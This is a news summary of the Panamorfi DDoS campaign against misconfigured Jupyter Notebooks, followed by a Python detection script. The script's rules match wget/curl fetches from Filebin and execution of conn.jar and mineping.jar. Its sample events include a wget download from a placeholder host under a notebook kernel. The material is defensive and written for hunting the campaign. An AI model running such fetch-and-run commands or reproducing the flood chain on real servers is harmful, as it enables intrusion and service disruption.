Hackers Exploit Misconfigured Jupyter Notebooks with Repurposed Minecraft DDoS Tool

August 3, 2024 at 01:06AM

Cybersecurity researchers disclosed a new DDoS attack campaign, Panamorfi, targeting misconfigured Jupyter Notebooks. The attack uses a Java-based tool, mineping, to launch a TCP flood DDoS attack on servers. Exploiting internet-exposed Jupyter Notebook instances, the attack aims to consume server resources and is attributed to the threat actor yawixooo. Previous attacks on Jupyter Notebooks have also been observed.

Panamorfi is a new distributed denial-of-service (DDoS) attack campaign that targets misconfigured Jupyter Notebooks and uses a Java-based tool called mineping to launch a TCP flood DDoS attack. The attackers exploit internet-exposed Jupyter Notebook instances to run wget commands that fetch a ZIP archive hosted on a file-sharing site named Filebin. The ZIP file contains two Java archive (JAR) files, conn.jar and mineping.jar. The former establishes connections to a Discord channel and triggers the execution of the mineping.jar package. The attack aims to consume the resources of the target server by sending a large number of TCP connection requests, and the results are written to the Discord channel.

The campaign has been attributed to a threat actor known as yawixooo, who has a public GitHub repository containing a Minecraft server properties file. This is not the first time internet-accessible Jupyter Notebooks have been targeted by adversaries: previous incidents were reported in October 2023.
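For defenders, the chain described above (a notebook kernel spawning wget against Filebin, then java running conn.jar and mineping.jar) can be hunted in process-execution telemetry. The following is an added example, not code from the researchers or the original article; the event format, rule names, URLs and PIDs are constructed for illustration.

```python
import json
import re

# Constructed process-execution events (pid, ppid, cmd); not captured from a real host.
SAMPLE_EVENTS = """\
{"pid": 100, "ppid": 1, "cmd": "/usr/bin/python3 /usr/local/bin/jupyter-notebook --ip=0.0.0.0"}
{"pid": 210, "ppid": 100, "cmd": "/usr/bin/python3 -m ipykernel_launcher -f /tmp/kernel-PLACEHOLDER.json"}
{"pid": 300, "ppid": 210, "cmd": "/bin/sh -c wget https://filebin.example/PLACEHOLDER/archive.zip"}
{"pid": 301, "ppid": 300, "cmd": "wget https://filebin.example/PLACEHOLDER/archive.zip"}
{"pid": 310, "ppid": 210, "cmd": "java -jar conn.jar"}
{"pid": 320, "ppid": 310, "cmd": "java -jar mineping.jar"}
{"pid": 400, "ppid": 1, "cmd": "wget https://mirror.example/packages/index.html"}
{"pid": 410, "ppid": 210, "cmd": "pip install pandas"}
"""

# Processes that mark a Jupyter server or kernel in the ancestry chain.
JUPYTER = re.compile(r"ipykernel_launcher|jupyter-(notebook|lab|server)")
# Hypothetical rule names; patterns follow the behaviour the article describes.
RULES = [
    ("download-from-filebin", re.compile(r"\b(wget|curl)\b.*filebin", re.I)),
    ("panamorfi-jar", re.compile(r"\bjava\b.*-jar\s+\S*(conn|mineping)\.jar\b", re.I)),
]

def under_jupyter(pid, procs):
    """Walk the parent chain and report whether any ancestor is a Jupyter process."""
    seen = set()
    while pid in procs and pid not in seen:  # 'seen' guards against PID loops
        seen.add(pid)
        pid = procs[pid]["ppid"]
        if pid in procs and JUPYTER.search(procs[pid]["cmd"]):
            return True
    return False

def detect(lines):
    """Return (pid, rule) for every rule match that descends from Jupyter."""
    events = [json.loads(l) for l in lines.splitlines() if l.strip()]
    procs = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        for name, rx in RULES:
            if rx.search(e["cmd"]) and under_jupyter(e["pid"], procs):
                hits.append((e["pid"], name))
    return hits

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} rule={rule}")
```

Requiring a Jupyter ancestor keeps the unrelated wget (pid 400) and the routine `pip install` from the kernel (pid 410) out of the alerts.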